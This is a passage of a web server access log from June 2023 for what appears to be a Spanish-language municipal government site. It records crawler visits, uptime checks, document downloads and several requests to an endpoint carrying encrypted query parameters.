PbMIg8Aqw/0gFjd3HRHfTB/yfU6RQRIs9P2CyE9lr6dd5d8TDnhOQKwwUa3fZE1dWA0g7YYI4QVIrKTK3uUu7D0Vd9hY2YTP+xgBYqtJznhwF050QsdfB8i5aWBGoTkL0YZHyWWRTddwVEMhRI6hOevjtNigaJJDGgTWYJQizP/9MYX+rNydz3NR4y/4S+R79oHLVpN9Pj+vlY2T0F3sKuw4QZv8+nMT9ONnTRZV8Z5d5K3isVW605XdxXxBEPvAS1VDPq/As49ZMehqJ+FVUVTyNPcsLQzRUchSPgUZpvbbz1YtjntkGDk5gnaTW5XPr89hYSJ0LnK0HJ9LpfB0nSbWahZbC4YEzpI1MpsU/TNs2SIn3ohs0hy+FaQX2sQLv92PdPOEsniyDdmpPefqmmRKZ5Zs4Kj8AiRfo3VdkJfZH9xIQiP/m1dggJ7F3Fygls0dYFCl4S66YGkwK4Vnq6nVJoghBbQYiMcs3np4IF+W/heXfA366KGIPfgrN9f8Yzsb/Fx5YGPHz5bwxEIqzZlEr05tNqLp1GF/uVLyX1Z8eKaFabFD9nI1faAyN10Q46nXsgbM9xQ0Itvj7u+RZMYdbhBU4kXrVV28r0rFDyAnbQFBzShf3urvAJ4Ohey52SWDC6/wJ2F1CW6r324tn52XQyZaHDZntZTy8rb05yrbpH4i1iJhaw/iyde3Q4ibQLgbVF4No2mG0sR8EWre6Ubjd05kHLEu1YEdreej84ig4OS0qX4qdn9/p29fcpof0XNnBh2tfFLVS381LHf9n10glSlPnUrmKvnMHdK98mEsst04CkFWt4H6SJMRqOsUlqItxUkd+Kx3wu8VuiOE7PtLZaCOlLzKFIb6gpZeH5AIhOzccOXDtrLFe0x2HvPMyEF1FU9LIy0dyQdwZgqVYU075JsxKA8+C4dveS07gbM56EOM8dwlEtkHoau+OhRxdkHxPCXUHwJ1IM491/D434wN1MsuSc7S1XK0X4bSsRfNbA3Gmm+zfWnEP360ZEPoJZd2t3v9YpQH09/GMbWwsNt7fvtLjbXhdQ4aDAtiN7RBu7QptiXzUCCVtsSZdSN59x3UE5pg==&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 26
186.102.57.72 - - [05/Jun/2023:05:10:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+XJ1j5Qg8oKs1LMqJxYyQTAikIlAA3mGiPvQmaY6jCgMyoTNewHm9H9VQtPOKcEe7C9eEIwnX3NSSzMEsv7PAS5B91gOYJ15ErZZsbeXtyKV6JWcEJC5ELYFby8txD9iQ0IfuVaK1VLVQsQPcUU1KablmmaM1IiiU=&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 26
186.102.57.72 - - [05/Jun/2023:05:10:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19NLRd/QBUsHCPNobYnNr0b/uEPAAuYU7GPmfS8wZ3tqZgk2jFnTdEnx+SXKg0ZTDOWPUxCLmKTD3Q8TezKbfFPAlEUqBhTSkN7v9Or5tbheW3nFgHKqUv5Qapne9ZTGf40iAb+42ftLNS5ToKS2XGHUG7S9tDe0zA=&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 26
186.102.57.72 - - [05/Jun/2023:05:10:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18GBzz/jAfh6pO/F7lsLwA6rtVTy4jO4Ga5kAX0OX5w7LHRJrZ8u7aMADOD2WaaVqzI318Ddiis4CVG3jKedinBfVlHe7y1KCw78cpxKw/vqTtjC69sd+BfX1VcPxpCRvf3e/VrP65mohjoC2vYHm8tqsPebDgaqjk=&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 26
186.102.57.72 - - [05/Jun/2023:05:10:44 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18jE99oEQt9pt3yuFlyrmh4yATo5T18uYEpZLkbcHq/g4OXw8taxqSgn25BTR3oNXBe6r9qCAsvzBElAMiTtbPngTesTDHfllFpInuek39bArPGzq0PAHcyl/Vrogvt9lX/P658pW2znWVfi0VixDkM+TVfMJgwe/o0DVrBQNor1CZKTe/I7cSBDqDy99Nb+GT10ECVw+0/9A==&u=U2FsdGVkX1/kFZTqjZk55cr3//rU9i0PLIMp+4V9uq5uYiwnsEH62LlWM2d/z6zQ&y=U2FsdGVkX19OMSqnM9OYHCZoFE4wka46dQ4ZR5Pcu7uhSZmbjKhHlyyCAvfvnNxo HTTP/1.1" 200 26
216.245.221.92 - - [05/Jun/2023:05:12:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:12:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:13:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
157.55.39.239 - - [05/Jun/2023:05:16:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/1707.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Jun/2023:05:17:55 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.158 - - [05/Jun/2023:05:18:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/1188.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:05:18:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.72 - - [05/Jun/2023:05:20:14 -0500] "GET /inscribete-en-este-proceso-de-formacion-para-ser-un-lider-o-una-lideresa-ambiental-en-tu-localidad.html HTTP/1.1" 200 903
172.22.2.4 - - [05/Jun/2023:05:19:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:05:22:55 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:05:24:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4383.pdf HTTP/1.1" 200 361916
152.32.129.53 - - [05/Jun/2023:05:25:12 -0500] "GET / HTTP/1.1" 200 319
199.16.157.180 - - [05/Jun/2023:05:25:16 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
172.22.2.4 - - [05/Jun/2023:05:24:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
43.153.115.234 - - [05/Jun/2023:05:25:57 -0500] "GET /galeria/galeria/fotos/Capellania4P.jpg HTTP/1.1" 200 37377
172.22.2.4 - - [05/Jun/2023:05:24:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
216.245.221.92 - - [05/Jun/2023:05:27:55 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.241 - - [05/Jun/2023:05:28:23 -0500] "GET /POT-2013/Cartografia/08_Respuesta_Sismica_V1_2013.pdf HTTP/1.1" 304 -
191.95.61.98 - - [05/Jun/2023:05:28:55 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
191.95.61.98 - - [05/Jun/2023:05:28:55 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
181.59.148.12 - - [05/Jun/2023:05:28:58 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
172.22.2.4 - - [05/Jun/2023:05:30:57 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [05/Jun/2023:05:31:10 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
40.77.167.97 - - [05/Jun/2023:05:31:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2205.pdf HTTP/1.1" 200 441292
172.22.2.4 - - [05/Jun/2023:05:29:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.79.15 - - [05/Jun/2023:05:31:49 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
199.16.157.180 - - [05/Jun/2023:05:31:51 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
172.22.2.4 - - [05/Jun/2023:05:31:55 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 2146608
172.22.2.4 - - [05/Jun/2023:05:31:55 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf&sa=U HTTP/1.1" 404 1140
172.22.2.4 - - [05/Jun/2023:05:30:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [05/Jun/2023:05:32:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:35:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:05:37:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0218.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Jun/2023:05:37:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:05:36:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
172.22.2.4 - - [05/Jun/2023:05:38:21 -0500] "GET /BLA/boletinlegal/console/ HTTP/1.1" 404 1018
40.77.167.97 - - [05/Jun/2023:05:39:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/2761.pdf HTTP/1.1" 304 -
